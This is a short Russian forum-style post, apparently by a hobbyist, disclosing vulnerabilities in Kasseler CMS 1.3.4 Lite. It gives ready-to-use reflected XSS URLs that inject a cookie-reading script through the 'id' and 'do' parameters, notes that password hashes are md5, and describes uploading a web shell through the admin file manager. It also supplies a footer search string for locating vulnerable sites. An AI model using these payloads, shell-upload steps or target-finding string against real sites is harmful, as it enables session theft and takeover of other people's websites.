Kasseler CMS 1.3.4 Lite возможно и ранние версии
http://www.kasseler-cms.net/


Пасивные XSS:

1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(doc ument.cookie)</script>
или
2.http://*****.ru/index.php?module=News&do=<script>alert(document.co okie)</script>&id=1

Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка

hash - md5

Заливка шела:
Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него

Как искать:
by Kasseler CMS. All rights reserved.

Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)